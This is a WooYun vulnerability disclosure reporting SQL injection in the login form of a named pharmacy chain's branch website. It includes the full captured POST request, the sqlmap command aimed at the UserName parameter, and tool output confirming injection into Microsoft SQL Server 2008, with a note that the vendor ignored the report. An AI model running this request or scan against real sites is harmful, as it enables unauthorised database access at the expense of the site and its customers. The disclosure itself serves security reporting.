当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138163

漏洞标题:和平药房另一分站SQL注射漏洞

相关厂商:hp1997.com

漏洞作者: 路人甲

提交时间:2015-08-31 15:24

修复时间:2015-09-05 15:26

公开时间:2015-09-05 15:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-31: 细节已通知厂商并且等待厂商处理中
2015-09-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:


注入

详细说明:

http://www.cqpds.com.cn/


看好域名 这是另一分站不一样的, 内容也不一样,
证明下

1.jpg


2.jpg


POST注入

POST /Menu.aspx HTTP/1.1
Host: www.cqpds.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Referer: http://www.cqpds.com.cn/
Content-Length: 4446
Cookie: CNZZDATA408690=cnzz_eid%3D1845074286-1440228084-%26ntime%3D1440992773; ASP.NET_SessionId=keglaoeypbebfvedb1v1bkie
Connection: keep-alive
Pragma: no-cache
ctl00%24ScriptManager1=ctl00%24ContentPlaceHolder1%24UpdatePanel_Tree%7Cctl00%24ContentPlaceHolder1%24Login1%24LoginButton&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE0NzY0MjIzMDIPZBYCZg9kFgICAw9kFhICAw8PFgIeF0VuYWJsZUFqYXhTa2luUmVuZGVyaW5naGQWAmYPDxYCHwBoZGQCBQ8PFgQeBkhlaWdodBsAAAAAAABOQAEAAAAeBF8hU0ICgAFkFgICAQ8PFgweCEltYWdlVXJsBSEvQXBwX1RoZW1lcy9PcmFuZ2UvUGljL1dlYl8wMy5naWYeBVdpZHRoGwAAAAAAIG1AAQAAAB8BGwAAAAAAAE5AAQAAAB4LQm9yZGVyV2lkdGgbAAAAAAAAAAABAAAAHgtCb3JkZXJTdHlsZQsqJVN5c3RlbS5XZWIuVUkuV2ViQ29udHJvbHMuQm9yZGVyU3R5bGUAHwIC4ANkZAIHDw8WBB4IQ3NzQ2xhc3MFD2Rpdl9tZW51X2ZvcndhZB8CAgJkZAIJDw8WBB4JQmFja0NvbG9yCgAfAgIIZBYCAgEPFCsAAhQrAAIPFgIfAGhkEBYEZgIBAgICAxYEFCsAAg8WCh4FVmFsdWUFAjAxHgRUZXh0BQbpppbpobUeC05hdmlnYXRlVXJsBQlNZW51LmFzcHgfBwUKTWVudV9GcmlzdB8CAgJkZBQrAAIPFgofCQUCMDIfCgUG5paw6Ze7HwsFCU5ld3MuYXNweB8HBQlNZW51X2l0ZW0fAgICZGQUKwACDxYKHwkFAjAzHwoFEumhvuWuouiHquWKqeacjeWKoR8LZR8HBQlNZW51X2l0ZW0fAgICZA8UKwADFCsAAg8WCh8JBQQwMzAxHwoFEuS8muWRmOenr%2BWIhuafpeivoh8LBRpDdF9RdWVyeS5hc3B4P3dpbmRvdz0xMDA1MR8HBQtSYWRNZW51SXRlbR8CAgJkZBQrAAIPFgofCQUEMDMwMh8KBRXmj5DotKfljaHplIDllK7mmI7nu4YfC2UfBwUQUmFkTWVudUl0ZW1fTGFzdB8CAgJkZBQrAAIPFgofCQUEMDMwMx8KBQzlk4Hnp43mn6Xor6IfCwUaQ3RfUXVlcnkuYXNweD93aW5kb3c9MTAwNTMfBwUQUmFkTWVudUl0ZW1fTGFzdB8CAgJkZA8UKwEDZmZmFgEFc1RlbGVyaWsuV2ViLlVJLlJhZE1lbnVJdGVtLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDA4LjEuNDE1LjM1LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTU3OThiNjMwZTAyZDc0ZmMUKwACDxYKHwkFAjA0HwoFCeeVmeiogOadvx8LBQxOb3RlcGFkLmFzcHgfBwUJTWVudV9pdGVtHwICAmRkDxYEZmZmZhYBBXNUZWxlcmlrLldlYi5VSS5SYWRNZW51SXRlbSwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAwOC4xLjQxNS4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj01Nzk4YjYzMGUwMmQ3NGZjZBYIZg8PFgofCQUCMDEfCgUG6aaW6aG1HwsFCU1lbnUuYXNweB8HBQpNZW51X0ZyaXN0HwICAmRkAgEPDxYKHwkFAjAyHwoFBuaWsOmXux8LBQlOZXdzLmFzcHgfBwUJTWVudV9pdGVtHwICAmRkAgIPDxYKHwkFAjAzHwoFEumhvuWuouiHquWKqeacjeWKoR8LZR8HBQlNZW51X2l0ZW0fAgICZBYGZg8PFgofCQUEMDMwMR8KBRLkvJrlkZjnp6%2FliIbmn6Xor6IfCwUaQ3RfUXVlcnkuYXNweD93aW5kb3c9MTAwNTEfBwULUmFkTWVudUl0ZW0fAgICZGQCAQ8PFgofCQUEMDMwMh8KBRXmj5DotKfljaHplIDllK7mmI7nu4YfC2UfBwUQUmFkTWVudUl0ZW1fTGFzdB8CAgJkZAICDw8WCh8JBQQwMzAzHwoFDOWTgeenjeafpeivoh8LBRpDdF9RdWVyeS5hc3B4P3dpbmRvdz0xMDA1Mx8HBRBSYWRNZW51SXRlbV9MYXN0HwICAmRkAgMPDxYKHwkFAjA0HwoFCeeVmeiogOadvx8LBQxOb3RlcGFkLmFzcHgfBwUJTWVudV9pdGVtHwICAmRkAgsPZBYIAgEPZBYCAgEPZBYCZg9kFgQCAQ9kFgJmD2QWAgIFDxAPFgYeDURhdGFUZXh0RmllbGQFCkxvZ2luVGl0bGUeDkRhdGFWYWx1ZUZpZWxkBQxMb2dpbkNsYXNzSWQeC18hRGF0YUJvdW5kZ2QQFQYS5L%2Bd5YiG5oC76YOo6IGM5ZGYEuaxn%2BWIhuaAu%2BmDqOiBjOWRmA%2Fkv53liIbkvpvplIDllYYP5rGf5YiG5L6b5bqU5ZWGEuS5neWIhuaAu%2BmDqOiBjOWRmA%2FljJfnoprkvpvlupTllYYVBgFBAUIBQwFEAUUBTRQrAwZnZ2dnZ2dkZAIDDxQrAAIUKwACFCsAAg8WAh8AaGRkZGRkAgcPDxYMHhBWaXNpYmxlU3RhdHVzYmFyaB4FVGl0bGUFDOS%2FoeaBr%2BaPkOekuh8EGwAAAAAAwHxAAQAAAB4PVmlzaWJsZVRpdGxlYmFyZx4SS2VlcEluU2NyZWVuQm91bmRzZx4RVmlzaWJsZU9uUGFnZUxvYWRoZGQCCQ9kFgICAQ8PFggfAwUnL0FwcF9UaGVtZXMvT3JhbmdlL1BpYy9hZDIwMDgxMjExMDIuZ2lmHwQbAAAAAAAogEABAAAAHwEbAAAAAAAgaEABAAAAHwICgANkZAIPD2QWAmYPZBYCAgMPDxYCHwoFEeWcqOe6v%2BaVsO%2B8mjYw5Lq6ZGQCEw8PFgIfCgUEMjAxNWRkAhUPDxYCHwoFDOWSjOW5s%2BiNr%2BaIv2RkAhcPDxYCHwoFjwHkupLogZTnvZHoja%2Flk4Hkv6Hmga%2FmnI3liqHorrjlj6%2For4HvvJoo5ridKS3pnZ7nu4%2FokKXmgKctMjAwOC0wMDAxIOermeeCuemCrueuse%2B8mjxhIGhyZWY9Im1haWx0bzpocHlmQG1haWwuY3FwZHMuY29tIj5ocHlmQG1haWwuY3FwZHMuY29tPC9hPmRkAhkPDxYEHwoFiwE8c2NyaXB0IHNyYz0naHR0cDovL3M3Ny5jbnp6LmNvbS9zdGF0LnBocD9pZD0xMTg1ODY3JndlYl9pZD0xMTg1ODY3JnNob3c9cGljMScgbGFuZ3VhZ2U9J0phdmFTY3JpcHQnIGNoYXJzZXQ9J2diMjMxMic%2BPC9zY3JpcHQ%2BPGJyIC8%2BPGJyIC8%2BHgdWaXNpYmxlaGRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYFBRdjdGwwMCRSYWRXaW5kb3dNYW5hZ2VyMQUQY3RsMDAkUmFkV2luZG93MQUSY3RsMDAkUmFkTWVudV9NYWluBSxjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJExvZ2luMSRMb2dpbkJ1dHRvbgUmY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRSYWRUcmVlVmlldzGV%2FNUGpw05f%2BgJa5S8eHNPM1eDmg%3D%3D&ctl00_RadWindow1_ClientState=&ctl00_RadWindowManager1_ClientState=&ctl00_RadMenu_Main_ClientState=&ctl00%24ContentPlaceHolder1%24Login1%24DropDownList_Class=A&ctl00%24ContentPlaceHolder1%24Login1%24UserName=admin&ctl00%24ContentPlaceHolder1%24Login1%24Password=111111&ctl00_ContentPlaceHolder1_RadTreeView1_ClientState=%7B%22expandedNodes%22%3A%5B%5D%2C%22collapsedNodes%22%3A%5B%5D%2C%22logEntries%22%3A%5B%5D%2C%22selectedNodes%22%3A%5B%5D%2C%22checkedNodes%22%3A%5B%5D%2C%22scrollPosition%22%3A0%7D&__ASYNCPOST=true&ctl00%24ContentPlaceHolder1%24Login1%24LoginButton.x=19&ctl00%24ContentPlaceHolder1%24Login1%24LoginButton.y=14


ctl00%24ContentPlaceHolder1%24Login1%24UserName 存在注入

漏洞证明:

python sqlmap.py -r 1.txt -p ctl00%24ContentPlaceHolder1%24Login1%24UserName
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150803}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user'
s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 16:12:34
[16:12:34] [INFO] parsing HTTP request from '1.txt'
[16:12:34] [INFO] testing connection to the target URL
[16:12:35] [INFO] testing if the target URL is stable
[16:12:35] [INFO] target URL is stable
[16:12:36] [WARNING] heuristic (basic) test shows that POST parameter 'ctl00$ContentPlaceHolder1$Login1$UserName' might
not be injectable
[16:12:36] [INFO] testing for SQL injection on POST parameter 'ctl00$ContentPlaceHolder1$Login1$UserName'
[16:12:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:12:37] [WARNING] reflective value(s) found and filtering out
[16:12:48] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[16:12:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[16:12:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[16:12:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[16:12:57] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[16:12:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[16:13:00] [INFO] testing 'MySQL inline queries'
[16:13:00] [INFO] testing 'PostgreSQL inline queries'
[16:13:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:13:01] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[16:13:03] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[16:13:04] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[16:13:16] [INFO] POST parameter 'ctl00$ContentPlaceHolder1$Login1$UserName' seems to be 'Microsoft SQL Server/Sybase st
acked queries (comment)' injectable
it looks like the back-end DBMS is '['Microsoft SQL Server', 'Sybase']'. Do you want to skip test payloads specific for
other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for '['Microsoft SQL Server', 'Sybase']' extending provided le
vel (1) and risk (1) values? [Y/n] n
[16:13:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[16:13:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:13:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one othe
r (potential) technique found
[16:13:49] [INFO] target URL appears to be UNION injectable with 4 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y
/n] y
[16:14:33] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--db
ms=mysql')
[16:14:33] [INFO] checking if the injection point on POST parameter 'ctl00$ContentPlaceHolder1$Login1$UserName' is a fal
se positive
POST parameter 'ctl00$ContentPlaceHolder1$Login1$UserName' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] y
sqlmap identified the following injection point(s) with a total of 108 HTTP(s) requests:
[16:15:15] [INFO] testing Microsoft SQL Server
[16:15:15] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to preve
nt potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[16:15:32] [INFO] confirming Microsoft SQL Server
[16:15:43] [INFO] adjusting time delay to 2 seconds due to good response times
[16:15:45] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[16:15:45] [INFO] fetched data logged to text files under
[*] shutting down at 16:15:45


由于跑得慢 跑出了一点表

3.jpg


修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-05 15:26

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无